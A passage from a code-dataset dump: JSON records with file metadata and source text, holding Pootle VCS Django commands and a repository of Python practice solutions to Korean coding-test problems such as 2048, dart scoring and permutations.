See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom pootle_vcs.management.commands import SubCommand\n\n\nclass FetchTranslationsCommand(SubCommand):\n help = \"Fetch translations into Pootle from VCS.\"\n\n def handle(self, project, *args, **options):\n self.get_vcs(project).fetch_translation_files()\n" }, { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 22.399999618530273, "blob_id": "71d8f52ea0d8d41aab7b0984a808365b53934b79", "content_id": "99ba1427a312e813494ab9f5c881d600da748896", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 36, "num_lines": 5, "path": "/pootle_vcs/__init__.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "from .plugins import Plugins, Plugin\nfrom .files import RepositoryFile\n(Plugin, RepositoryFile)\n\nplugins = Plugins()\n" }, { "alpha_fraction": 0.5651214122772217, "alphanum_fraction": 0.5805739760398865, "avg_line_length": 21.649999618530273, "blob_id": "db2ccf5663038dc894b60c9d2ef24755f061940b", "content_id": "f4ccfb7afaee40102b9e3e6a44d62ca080caf004", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 453, "license_type": "no_license", "max_line_length": 65, "num_lines": 20, "path": "/pootle_vcs/migrations/0002_projectvcs_project_type.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pootle_vcs', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='projectvcs',\n name='project_type',\n field=models.CharField(default='git', max_length=32),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 
0.5067650675773621, "alphanum_fraction": 0.5161951780319214, "avg_line_length": 37.109375, "blob_id": "2a533a7fe31b5a132a958199dec28b3a9031e850", "content_id": "8695bd3aaa1671ceb030c140b33bd2363d0f4abd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2439, "license_type": "no_license", "max_line_length": 77, "num_lines": 64, "path": "/pootle_vcs/management/commands/vcs_commands/status.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom pootle_vcs.models import ProjectVCS\n\nfrom pootle_vcs.management.commands import SubCommand\n\n\nclass StatusCommand(SubCommand):\n help = \"Status of vcs repositories.\"\n\n def handle(self, project, *args, **options):\n try:\n vcs = project.vcs.get()\n except ProjectVCS.DoesNotExist:\n vcs = None\n status = vcs.status()\n synced = (\n not status['CONFLICT']\n and not status['POOTLE_AHEAD']\n and not status['POOTLE_ADDED']\n and not status['VCS_ADDED']\n and not status['VCS_AHEAD'])\n if synced:\n self.stdout.write(\"Everything up-to-date\")\n return\n if status[\"CONFLICT\"]:\n self.stdout.write(\"Both changed:\")\n for repo_file in status[\"CONFLICT\"]:\n self.stdout.write(repo_file)\n if status[\"POOTLE_ADDED\"]:\n for store in status[\"POOTLE_ADDED\"]:\n self.stdout.write(\n \" %-50s %-50s %-20s\\n\"\n % (\"\", store.pootle_path,\n \"Pootle added: %s\" % store.get_max_unit_revision()))\n if status[\"POOTLE_AHEAD\"]:\n self.stdout.write(\"Pootle changed:\")\n for repo_file in status[\"POOTLE_AHEAD\"]:\n self.stdout.write(repo_file)\n if status[\"VCS_ADDED\"]:\n for store_vcs in status[\"VCS_ADDED\"]:\n self.stdout.write(\n \" %-50s %-50s 
%-10s\\n\"\n % (store_vcs.path,\n store_vcs.store.pootle_path,\n \"VCS added: %s\"\n % store_vcs.repository_file.latest_commit[:8]))\n if status[\"VCS_AHEAD\"]:\n for store_vcs in status[\"VCS_AHEAD\"]:\n self.stdout.write(\n \" %-50s %-50s %-20s\\n\"\n % (store_vcs.path,\n store_vcs.store.pootle_path,\n \"VCS updated: %s...%s\"\n % (store_vcs.last_sync_commit[:8],\n store_vcs.repository_file.latest_commit[:8])))\n self.stdout.write(\"\\n\")\n" }, { "alpha_fraction": 0.6081677675247192, "alphanum_fraction": 0.620309054851532, "avg_line_length": 35.2400016784668, "blob_id": "2d86f4310e3ee64dc2a55eebafe3366ef5b514e9", "content_id": "602aa3191341364dcbd898a0e9c9bfad002c28c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 906, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/pootle_vcs/management/commands/vcs_commands/files.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom pootle_vcs.management.commands import SubCommand\n\n\nclass FilesCommand(SubCommand):\n help = \"List VCS translations files managed by Pootle.\"\n\n def handle(self, project, *args, **options):\n vcs = self.get_vcs(project)\n files = vcs.list_translation_files()\n for store_vcs in files.order_by(\"path\").iterator():\n self.stdout.write(\n \" %-50s %-50s %-12s %-12s \\n\"\n % (store_vcs.path,\n store_vcs.store.pootle_path,\n store_vcs.last_sync_revision,\n (store_vcs.last_sync_commit or '')[:8]))\n" } ]
19
Onedas/coding_test_practice
https://github.com/Onedas/coding_test_practice
e43bcdec328f9f5a6c0a5119ad41b0bcd23fe413
e033e9ff7ce0a49a99291956fc0b4328898d4ea5
544e30bf8ee8a28047efe34456da65fd9fa200c5
refs/heads/master
2020-08-22T19:13:25.897809
2020-07-09T12:16:45
2020-07-09T12:16:45
216,463,229
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5163636207580566, "alphanum_fraction": 0.5381818413734436, "avg_line_length": 14.222222328186035, "blob_id": "6f706a43f8a55ea1cff224ab58f0b87749ca96bb", "content_id": "3edd4784ae11b4b3e67a933aa76296678bf4afe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 43, "num_lines": 18, "path": "/백준/GCD 합_9613.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def gcd(a,b):\n\twhile b!=0:\n\t\tr = a%b\n\t\ta = b\n\t\tb = r\n\treturn a\n\nT = int(input())\nfor t in range(T):\n\ttest_case = list(map(int,input().split()))\n\tn = test_case[0]\n\tnums = test_case[1:]\n\n\tS = 0\n\tfor i,a in enumerate(nums[:-1]):\n\t\tfor b in nums[i+1:]:\n\t\t\tS+=gcd(a,b)\n\tprint(S)\n\n" }, { "alpha_fraction": 0.37051039934158325, "alphanum_fraction": 0.43667295575141907, "avg_line_length": 20.15999984741211, "blob_id": "dfe82e5c49cc2b268acfa6dae661329ba2e9f27f", "content_id": "9f4f5789944b44b7e2a6645acfaf093f3545ddca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 529, "license_type": "no_license", "max_line_length": 48, "num_lines": 25, "path": "/kakao/체육복.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(n,lost,reserve):\n answer=0\n\n li=[1 if n>=i>0 else -1 for i in range(n+2)]\n for i in lost:\n li[i]-=1\n for i in reserve:\n li[i]+=1\n\n for i in range(n+1):\n if li[i]==0:\n if li[i-1]==2:\n li[i-1]=1\n li[i]=1\n elif li[i+1]==2:\n li[i+1]=1\n li[i]=1\n\n answer = sum([1 if x>0 else 0 for x in li])\n return answer\n\n\nprint(solution(5,[2,4],[1,3,5]))\nprint(solution(5,[2,4],[3]))\nprint(solution(3,[3],[1]))\n" }, { "alpha_fraction": 0.35865503549575806, "alphanum_fraction": 0.5660024881362915, "avg_line_length": 31.1200008392334, "blob_id": "65d50d2f9b7b2ddb56fda877d76edef57c638da9", "content_id": 
"d0992112f2eaab28d620f7288bf913742dcbf445", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1658, "license_type": "no_license", "max_line_length": 346, "num_lines": 50, "path": "/kakao/추석 트레픽_ 틀림 ㅠ.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(lines):\n answer=0\n timeline=[]\n checktime=[]\n for line in lines:\n line=line.lstrip()\n line=line.split(' ')\n dur=float(line[2].replace('s',''))*1000\n HH=int(line[1][0:2])*24*60*1000\n MM=int(line[1][3:5])*60*1000\n SS=float(line[1][6:])*1000\n time=HH+MM+SS\n start_t=time-dur+1\n\n timeline.append((int(start_t),int(time)))\n checktime.append(start_t)\n checktime.append(time-1)\n\n for check_t in checktime:\n count=0\n for log in timeline:\n if is_exist(log,check_t):\n count+=1\n\n if answer < count:\n answer=count\n\n return answer\n\ndef is_exist(log, checktime):\n state=False\n if log[0]<=checktime<log[1]:\n state=True\n if log[0]<=checktime+999<log[1]:\n state=True\n if checktime<=log[0]<log[1]<=checktime+999:\n state=True\n if log[0]<=checktime and checktime+999<=log[1]:\n state=True\n\n return state\n\n\n\nif __name__==\"__main__\":\n # lines=['2016-09-15 01:00:04.001 2.0s', '2016-09-15 01:00:07.000 2s']\n lines='“2016-09-15 20:59:57.421 0.351s”, “2016-09-15 20:59:58.233 1.181s”, “2016-09-15 20:59:58.299 0.8s”, “2016-09-15 20:59:58.688 1.041s”, “2016-09-15 20:59:59.591 1.412s”, “2016-09-15 21:00:00.464 1.466s”, “2016-09-15 21:00:00.741 1.581s”, “2016-09-15 21:00:00.748 2.31s”, “2016-09-15 21:00:00.966 0.381s”, “2016-09-15 21:00:02.066 2.62s”'\n # lines='“2016-09-15 01:00:04.002 2.0s”, “2016-09-15 01:00:07.000 2s”'\n lines=lines.replace('“','').replace('”','').split(',')\n print(solution(lines))\n" }, { "alpha_fraction": 0.4337349534034729, "alphanum_fraction": 0.4859437644481659, "avg_line_length": 15.096774101257324, "blob_id": "5dd5ccc60ba3a1240a3ec9e18926fd8b73b5cbd8", "content_id": 
"4321ca1d0a7f8ef3a27579dd95c8a29f9cee6410", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 498, "license_type": "no_license", "max_line_length": 39, "num_lines": 31, "path": "/백준/10971.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "n = int(input())\nm= []\nfor _ in range(n):\n m.append(map(int,input().split()))\n#\n# n=4\n# m=[[0, 10, 15, 20],\n# [5, 0, 9, 10],\n# [6, 13, 0, 12],\n# [8, 8, 9, 0]\n# ]\n\nanswer=float('inf')\n\nimport itertools as it\npaths = list(it.permutations(range(n)))\n\nfor p in paths:\n start_p = list(p[:])\n end_p = list(p[1:])+ [p[0],]\n\n cal=0\n for i,j in zip(start_p,end_p):\n cal+=m[i][j]\n if cal>answer:\n break\n\n if cal<answer:\n answer=cal\n\nprint(answer)" }, { "alpha_fraction": 0.492803692817688, "alphanum_fraction": 0.5164076089859009, "avg_line_length": 21, "blob_id": "046e479549ff78775ba64214f353cb424f01753f", "content_id": "db61a2ecb0d6e689fab2497c87ace34048382c1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "no_license", "max_line_length": 51, "num_lines": 79, "path": "/백준/14500_2.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "import sys\ninput=sys.stdin.readline\nrow, col= map(int,input().split())\nM=[]\nfor r in range(row):\n M.append(list(map(int,input().split())))\n\nanswer=0\ndef bar(x,y):\n global answer\n s=0\n if x<=row-4: #l\n s=M[x][y]+M[x+1][y]+M[x+2][y]+M[x+3][y]\n\n answer=max(s,answer)\n\ndef square(x,y):\n global answer\n s=0\n if x<=row-2 and y<=col-2: #ㅁ\n s=M[x][y]+M[x+1][y]+M[x][y+1]+M[x+1][y+1]\n answer = max(s,answer)\n\ndef L_shape(x,y):\n global answer\n s=0\n if x<=row-3 and y<=col-2:\n s=M[x][y]+M[x+1][y]+M[x+2][y]+M[x+2][y+1]\n answer= max(s,answer)\n\ndef Z_shape(x,y):\n global answer\n s=0\n if x<=row-3 and y<=col-2:\n s=M[x][y]+M[x+1][y]+M[x+1][y+1]+M[x+2][y+1]\n answer = max(s, 
answer)\n\ndef T_shape(x,y):\n global answer\n s=0\n if x<=row-2 and y<=col-3:\n s=M[x][y]+M[x][y+1]+M[x+1][y+1]+M[x][y+2]\n answer=max(s,answer)\n\ndef RotateMap_clockwise(row,col,M):\n new_map=[[0]*row for _ in range(col)]\n for i in range(row):\n for j in range(col):\n new_map[j][row-1-i]=M[i][j]\n\n return col,row,new_map\n\ndef FilpMap(row,col,M):\n new_map=[[0]*col for _ in range(row)]\n for i in range(row):\n for j in range(col):\n new_map[row-1-i][j]=M[i][j]\n return row,col,new_map\n\n\nfor _ in range(4):\n for i in range(row):\n for j in range(col):\n bar(i,j)\n square(i,j)\n L_shape(i,j)\n Z_shape(i,j)\n T_shape(i,j)\n row,col,M=RotateMap_clockwise(row,col,M)\n\nrow,col,M=FilpMap(row,col,M)\nfor _ in range(4):\n for i in range(row):\n for j in range(col):\n L_shape(i,j)\n Z_shape(i,j)\n row,col,M=RotateMap_clockwise(row,col,M)\n\nprint(answer)" }, { "alpha_fraction": 0.6147058606147766, "alphanum_fraction": 0.6323529481887817, "avg_line_length": 14.5, "blob_id": "260e2ea895b3d860d0d41694835283ee361e0455", "content_id": "32470487eed63e7e99112d32509d7284c1554925", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 29, "num_lines": 22, "path": "/백준/일곱 난쟁이_2309.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "dwarfs = []\nfor _ in range(9):\n\tdwarfs.append(int(input()))\n\ndwarfs.sort()\nrest = sum(dwarfs) - 100\n\nno_dwarf = []\nfor i,a in enumerate(dwarfs):\n\tif len(no_dwarf)==2:\n\t\tbreak\n\n\tfor b in dwarfs[i+1:]:\n\t\tif a+b == rest:\n\t\t\tno_dwarf.append(a)\n\t\t\tno_dwarf.append(b)\n\t\t\tbreak\n\nfor dwarf in dwarfs:\n\tif dwarf in no_dwarf:\n\t\tcontinue\n\tprint(dwarf)" }, { "alpha_fraction": 0.6238095164299011, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 18.18181800842285, "blob_id": "7ceba92a3d0d151eb110b66bc4d904994c7bdcd9", "content_id": "72bb2509d4e92e0196e1ba29f89223c02f7d672f", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 210, "license_type": "no_license", "max_line_length": 58, "num_lines": 11, "path": "/백준/1, 2, 3 더하기_9095.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def onetwothree(n):\n\tif n==1:\n\t\treturn 1\n\telif n==2:\n\t\treturn 2\n\telif n==3:\n\t\treturn 4\n\treturn onetwothree(n-3)+onetwothree(n-2)+onetwothree(n-1)\n\nfor t in range(int(input())):\n\tprint(onetwothree(int(input())))" }, { "alpha_fraction": 0.3976608216762543, "alphanum_fraction": 0.4181286692619324, "avg_line_length": 20.061538696289062, "blob_id": "188a15f4b87bf3a057af4db60688b0a85bee2bbe", "content_id": "d2f950625bb98d22677770c94065754ff37a083e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1368, "license_type": "no_license", "max_line_length": 57, "num_lines": 65, "path": "/python/2048.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "from sys import stdin\ninput = stdin.readline\nfrom collections import deque\n\n\nsize = int(input())\nm = [list(map(int,input().split())) for _ in range(size)]\nans=0\nq = deque()\n\ndef get(i,j):\n if m[i][j]:\n q.append(m[i][j])\n m[i][j]=0\n\ndef merge(i,j,di,dj):\n while q:\n x=q.popleft()\n if not m[i][j]:\n m[i][j] = x\n elif m[i][j] == x:\n m[i][j] = 2*x\n i,j= i+di, j+dj\n else:\n i,j= i+di, j+dj\n m[i][j] = x\n\ndef move(k):\n if k==0:\n for j in range(size):\n for i in range(size):\n get(i,j)\n merge(0,j,1,0)\n elif k==1:\n for j in range(size):\n for i in range(size-1, -1, -1):\n get(i,j)\n merge(size-1,j,-1,0)\n elif k==2:\n for i in range(size):\n for j in range(size):\n get(i,j)\n merge(i,0,0,1)\n\n else:\n for i in range(size):\n for j in range(size-1, -1, -1):\n get(i,j)\n merge(i, size-1, 0, -1)\n\ndef solve(cnt):\n global m, ans\n if cnt ==5:\n for i in range(size):\n ans= max(ans, max(m[i]))\n return\n b=[x[:] for x 
in m]\n for k in range(4):\n move(k)\n solve(cnt+1)\n m=[x[:] for x in b]\n\nif __name__ == \"__main__\":\n solve(0)\n print(ans)" }, { "alpha_fraction": 0.5539215803146362, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 16.08333396911621, "blob_id": "dec1b4f6a58674c62d1d5ca605632d75a1510ccf", "content_id": "da9cdd5b0501ed5054ad920248318d307764f0df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 204, "license_type": "no_license", "max_line_length": 35, "num_lines": 12, "path": "/백준/N과 M3_15651.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N,M = map(int,input().split())\n\ndef re(count, visited):\n\tif count == M:\n\t\tprint(' '.join(map(str,visited)))\n\t\treturn\n\n\tfor i in range(1,N+1):\n\t\tre(count+1, visited+[i])\n\nfor i in range(1,N+1):\n\tre(1, [i])" }, { "alpha_fraction": 0.5222222208976746, "alphanum_fraction": 0.5333333611488342, "avg_line_length": 13.5, "blob_id": "7764c0dd2686bf2c53f301bf9411b3aa10555df7", "content_id": "326b1a292f351ec781599c5d0f75a8d2277bce01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "no_license", "max_line_length": 18, "num_lines": 6, "path": "/백준/차이를 최대로_10819.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def permu(arr):\n\tif len(arr) == 1:\n\t\treturn [arr]\n\telse:\n\t\tresult = []\n\t\tfor i in arr:\n\t\t\t" }, { "alpha_fraction": 0.43529412150382996, "alphanum_fraction": 0.4588235318660736, "avg_line_length": 14.904762268066406, "blob_id": "1b2a1cc021465a3eec947573c866943c4db57a2c", "content_id": "2faa71f5abf3b03d04322eaee3e372b5ab89dd41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 24, "num_lines": 21, "path": "/programas/점프와순간이동.py", "repo_name": "Onedas/coding_test_practice", 
"src_encoding": "UTF-8", "text": "def solution(n):\n ans = 0 \n ans = dp(n)\n return ans\n\ndef decorator_dp(func):\n d={}\n def wrapper(n):\n if n not in d:\n d[n]=func(n)\n return d[n]\n return wrapper\n\n@decorator_dp\ndef dp(n):\n if n==1:\n return 1\n if n%2 == 0:\n return dp(n/2)\n else:\n return dp(n-1)+1\n\n \n" }, { "alpha_fraction": 0.37139421701431274, "alphanum_fraction": 0.4375, "avg_line_length": 22.11111068725586, "blob_id": "571f21be058355480ed624bdd55570bd326c6870", "content_id": "bad7dea53efd3bca974fc83f28d36efd43011341", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 106, "num_lines": 36, "path": "/kakao/숫자야구.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(baseball):\n answer = 0\n plist = [str(i) + str(j) + str(k) for i in range(1, 10) for j in range(1, 10) for k in range(1, 10) if\n i != j and i != k and j != k]\n\n for p in plist:\n state=0\n for b in baseball:\n if compare(b[0],p)==(b[1],b[2]):\n state+=1\n\n if state==len(baseball):\n answer+=1\n\n return answer\n\n\ndef compare(s, o):\n strike = 0\n ball = 0\n s = str(s)\n o = str(o)\n for i in range(3):\n if s[i] == o[i]:\n strike += 1\n if s[0] == o[1] or s[0] == o[2]:\n ball += 1\n if s[1] == o[0] or s[1] == o[2]:\n ball += 1\n if s[2] == o[0] or s[2] == o[1]:\n ball += 1\n return (strike, ball)\n\n\nbaseball = [[123, 1, 1], [356, 1, 0], [327, 2, 0], [489, 0, 1]]\nprint(solution(baseball))\n" }, { "alpha_fraction": 0.44626864790916443, "alphanum_fraction": 0.4820895493030548, "avg_line_length": 20.645160675048828, "blob_id": "2b44d8d490fc2043866c76ced5731839a7c47938", "content_id": "63985a484af4300b6b3b8b41bd6250642d975c21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 670, "license_type": "no_license", "max_line_length": 37, "num_lines": 31, "path": "/kakao/뉴스 
클러스터링.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(str1,str2):\n answer=0\n Set_list=[]\n for str in (str1,str2):\n str=str.upper()\n before=str[0]\n a=[]\n for s in str[1:]:\n a.append(before+s)\n before=s\n Set_list.append(a)\n\n U,N=[],[]\n for _ in range(len(Set_list[0])):\n i=Set_list[0].pop(0)\n U.append(i)\n if i in Set_list[1]:\n N.append(i)\n Set_list[1].remove(i)\n for _ in range(len(Set_list[1])):\n i=Set_list[1].pop(0)\n U.append(i)\n\n answer=int(len(N)/len(U)*65536)\n return answer\n\n\nif __name__==\"__main__\":\n str1='FRANCE'\n str2='french'\n print(solution(str1,str2))" }, { "alpha_fraction": 0.3855421543121338, "alphanum_fraction": 0.4879518151283264, "avg_line_length": 14.090909004211426, "blob_id": "a3fd432ac9ab511c013eaa8fa54333b97b8f5286", "content_id": "74e456012b706809b328cf4de51b5a809249bb72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "no_license", "max_line_length": 33, "num_lines": 11, "path": "/백준/날짜 계산_1476.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "E,S,M = map(int,input().split())\ne,s,m = 0,0,0\ny = 1\nwhile True:\n\tif e+1==E and s+1==S and m+1==M:\n\t\tprint(y)\n\t\tbreak\n\ty+=1\n\te = (e+1)%15\n\ts = (s+1)%28\n\tm = (m+1)%19\n" }, { "alpha_fraction": 0.5268199443817139, "alphanum_fraction": 0.5478927493095398, "avg_line_length": 19.920000076293945, "blob_id": "e6f71a8241b8bfe00b3160255b3943e6dea5fc27", "content_id": "0d68333b8e1c6c4054fcd6a2ef5aec3ac0df6a80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 50, "num_lines": 25, "path": "/kakao/실패율.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "# 실패율\n# 스테이지 도달했으나 아직 클리어하지 못한 플레이어의 수/ 스테이지에 도달한 플레이어 수\nfrom sys import stdin\ninput=stdin.readline\n\n\ndef 
solution(N, stages):\n answer = []\n\n f={}\n histogram=[0 for _ in range(N+2)]\n for stage in stages:\n histogram[stage]+=1\n for i in range(1,N+1):\n fail=histogram[i]/sum(histogram[i:])\n try:\n f[fail].append(i)\n except:\n f[fail]=[i]\n while f:\n for i in f.pop(max(f)):\n answer.append(i)\n return answer\n\nprint(solution(4,[4,4,4,4,4]))" }, { "alpha_fraction": 0.34378379583358765, "alphanum_fraction": 0.36000001430511475, "avg_line_length": 21.0238094329834, "blob_id": "ce8c6fc17bb237053cb60ae06cd9eb31f05d3e84", "content_id": "2a8b21773275629dee7cea0f84564a53cc6f4d27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 925, "license_type": "no_license", "max_line_length": 35, "num_lines": 42, "path": "/kakao/다트게임.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(dartResult):\n answer=0\n\n a=[]\n state=''\n for s in dartResult:\n state += s\n if s=='#' or s=='*':\n a[-1]+=state\n state=''\n elif not (s.isnumeric()):\n a.append(state)\n state=''\n\n answer_ = []\n for a_ in a:\n for a__ in a_:\n if a__.isnumeric():\n score=int(a__)\n elif a__=='S':\n score**=1\n elif a__=='D':\n score**=2\n elif a__=='T':\n score**=3\n elif a__=='#':\n score*=-1\n if len(answer_)>0:\n answer_[-1]*=-1\n elif a__=='*':\n score*=2\n answer_*=2\n answer_.append(score)\n score=0\n answer=sum(answer_)\n\n return answer\n\n\nif __name__ ==\"__main__\":\n dartResult='1S2D*3T'\n print(solution(dartResult))\n" }, { "alpha_fraction": 0.4900990128517151, "alphanum_fraction": 0.5099009871482849, "avg_line_length": 24.375, "blob_id": "d2140807595cf96875be437537082fb2743ed6ad", "content_id": "13e691d0417f7c973d2b0f82a0d4ec9c6e6c7d7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 202, "license_type": "no_license", "max_line_length": 64, "num_lines": 8, "path": "/삼성SW/10200.py", "repo_name": "Onedas/coding_test_practice", 
"src_encoding": "UTF-8", "text": "import sys\n\nT = int(input())\nfor test_case in range(1, T + 1):\n N,A,B = map(int,input().split())\n M = min(A,B)\n m = max(A+B-N,0)\n print(\"#{} {} {}\".format(test_case, min(A,B), max(A+B-N,0)))" }, { "alpha_fraction": 0.42082110047340393, "alphanum_fraction": 0.4692082107067108, "avg_line_length": 23.39285659790039, "blob_id": "09c7e8e838b85c0933478cba8121596054a2cf8e", "content_id": "5171ca751d0e3bf559090bd9b666071b2e9b3f90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "no_license", "max_line_length": 48, "num_lines": 28, "path": "/kakao/카페트.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(brown, red):\n answer = []\n red_list=[[],[]] #가로, 세로\n for i in range(1,red+1):\n if red%i==0:\n if not i in red_list[0]:\n red_list[1].append(i)\n red_list[0].append(red//i)\n for row,col in zip(red_list[0],red_list[1]):\n p_brown=0\n i=-1\n while True:\n if p_brown>=brown:\n break\n else:\n i+=1\n p_brown+=2*(row+i)+2*(col+i)+4\n\n if p_brown==brown:\n return [row+2*(1+i),col+2*(1+i)]\n\n return answer\n\nprint(solution(10,2))\nprint(solution(8,1))\nprint(solution(24,24))\nprint(solution(16,9))\n# print(solution(10,2))" }, { "alpha_fraction": 0.6096823215484619, "alphanum_fraction": 0.6248108744621277, "avg_line_length": 24.461538314819336, "blob_id": "ad51c5739d14eee7b44d6b9f621e18debe97431c", "content_id": "f412809ccadd5a80e3580ac625820649843d708f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 661, "license_type": "no_license", "max_line_length": 59, "num_lines": 26, "path": "/백준/외판원 순회 2_10971.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "n=int(input())\nnums = list(map(int,input().split()))\nadd, sub, multi, division = list(map(int,input().split()))\nmaxv = -float('inf')\nminv = float('inf')\n\ndef cal(num, 
idx, add, sub, multi, division):\n\tglobal n, maxv, minv\n\tif idx == n:\n\t\tmaxv = max(num, maxv)\n\t\tminv = min(num, minv)\n\t\treturn\n\n\telse:\n\t\tif add:\n\t\t\tcal(num + nums[idx], idx+1, add-1, sub, multi, division)\n\t\tif sub:\n\t\t\tcal(num - nums[idx], idx+1, add, sub-1, multi, division)\n\t\tif multi:\n\t\t\tcal(num * nums[idx], idx+1, add, sub, multi-1, division)\n\t\tif division:\n\t\t\tcal(num/nums[idx], idx+1, add, sub, multi, division-1)\n\ncal(nums[0], 1, add, sub,multi,division)\nprint(int(maxv))\nprint(int(minv))" }, { "alpha_fraction": 0.4661921560764313, "alphanum_fraction": 0.5338078141212463, "avg_line_length": 15.529411315917969, "blob_id": "474f57e6a2f6b52d3146a6190d2acb0a4bac82fe", "content_id": "1c13b43a3ab14111caf49532d59d71a1730f2b46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "no_license", "max_line_length": 39, "num_lines": 17, "path": "/kakao/셔틀버스_완성x.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(n,t,m,timetable):\n answer=''\n StartTime='09:00'\n busTime=[]\n for i in range(n):\n busTime.append(i*m)\n\n\n return answer\n\n\nif __name__=='__main__':\n n=1\n t=1\n m=5\n timetable=['08:00','08:02','08:03']\n print(solution(n,t,m,timetable))\n" }, { "alpha_fraction": 0.37714284658432007, "alphanum_fraction": 0.3942857086658478, "avg_line_length": 14.909090995788574, "blob_id": "c5e75d874742c3b22563eb3661171219fdad57ad", "content_id": "79eedc53eecd844e4e802322dd345168e2638afd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 175, "license_type": "no_license", "max_line_length": 21, "num_lines": 11, "path": "/programas/숫자게임.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(A, B):\n answer = 0\n A.sort()\n B.sort()\n while A:\n a= A.pop()\n if B[-1]> a:\n answer+=1\n B.pop()\n\n return answer\n" }, { 
